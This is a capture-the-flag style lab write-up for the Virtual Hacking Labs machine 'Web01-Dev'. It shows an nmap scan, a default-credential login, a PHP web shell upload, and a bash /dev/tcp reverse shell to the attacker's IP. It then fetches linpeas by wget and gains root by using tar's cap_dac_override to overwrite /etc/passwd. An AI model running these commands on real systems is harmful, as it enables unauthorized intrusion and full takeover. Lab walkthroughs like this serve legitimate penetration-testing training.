WriteupsVHL — Web01-Dev
WebEasyLinux
VHL — Web01-Dev
Development web server with FTP credentials leaked via anonymous login. Credential reuse and web shell upload for root.
February 8, 2025Virtual Hacking Labs
#FTP#Web Shell#File Upload#Apache
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 17:55 EST
Nmap scan report for 10.11.1.6
Host is up (0.021s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 13:26:65:31:6d:fd:90:21:45:05:39:0d:c4:a0:26:1f (RSA)
| 256 0b:c3:57:44:33:fe:2a:1e:a4:73:72:36:1f:0a:89:22 (ECDSA)
|_ 256 c2:70:d5:e9:0b:af:c2:42:fa:51:45:e3:25:4f:2b:a9 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.30)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.30
|_http-title: CODIAD
8080/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.30)
|_http-title: Tiny File Manager
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.30
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/8%OT=21%CT=1%CU=43577%PV=Y%DS=2%DC=I%G=Y%TM=67A7E
OS:0E2%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=Z%TS=A)SEQ(SP=101%
OS:GCD=1%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP=102%GCD=1%ISR=10A%TI=Z%II=I%TS=A)OPS
OS:(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST1
OS:1NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU
OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 20.92 ms 10.11.1.6
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.37 seconds21
- allows anonymous login
sh
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub8000
sh
8080/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.30)
|_http-title: Tiny File Manager
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.30
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION80
sh
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.30)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.30
|_http-title: CODIADdefault login
admin:admin
webshell
- right click on the folder and upload a php webshell
reverse shell
sh
GET /workspace/Web01-Test/shell.php?0=bash+-i+>%26+/dev/tcp/172.16.1.3/1234+0>%261 HTTP/1.1sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.3] from (UNKNOWN) [10.11.1.6] 39884
bash: no job control in this shell
bash-4.2$ whoami
whoami
apachepriv esc
linpeas
sh
bash-4.2$ wget http://172.16.1.3/linpeas.shsh
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.23sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 100 127.0.0.1:25 *:*
tcp LISTEN 0 511 [::]:8080 [::]:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 32 [::]:21 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 100 [::1]:25 [::]:* tar capabilities (cap_dac_override)
sh
Files with capabilities (limited to 50):
/usr/bin/tar = cap_dac_override+ep
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+epsh
bash-4.2$ cp /etc/passwd /tmp/passwdsh
openssl passwd "root"
$1$FvhsWUlE$uw3CQduesP/.sjEy362QA0sh
root:$1$FvhsWUlE$uw3CQduesP/.sjEy362QA0:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologinsh
bash-4.2$ wget http://172.16.1.3/passwdsh
bash-4.2$ cat passwd
cat passwd
root:$1$FvhsWUlE$uw3CQduesP/.sjEy362QA0:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologinsh
bash-4.2$ tar -cf /tmp/passwd.tar -C /tmp passwd
bash-4.2$ tar -xf /tmp/passwd.tar -C /etc passwdsh
bash-4.2$ su root
su root
Password: root
whoami
root
python3 -c 'import pty; pty.spawn("/bin/bash")'
bash: line 2: python3: command not found
python -c 'import pty; pty.spawn("/bin/bash")'
[root@localhost tmp]# whoami
whoami
root
[root@localhost tmp]# cd /root
cd /root
[root@localhost ~]# ls
ls
anaconda-ks.cfg key.txt
[root@localhost ~]# cat key.txt
cat key.txt
H7hgf2kosa72u3fnjkdg
Up next
EasyFeb 2025
VHL — Web01-Prd
Production web server with anonymous FTP access. Weak credentials and misconfigured permissions lead to full compromise.
Read writeup
EasyFeb 2025
VHL — Forum
uftpd FTP server with anonymous access. Forum application vulnerability exploited to obtain a shell and escalate to root.
Read writeup
EasyFeb 2025
VHL — Quick
Quick.CMS v6.7 with a known authenticated RCE vulnerability. Admin credentials discovered via enumeration for initial access.
Read writeup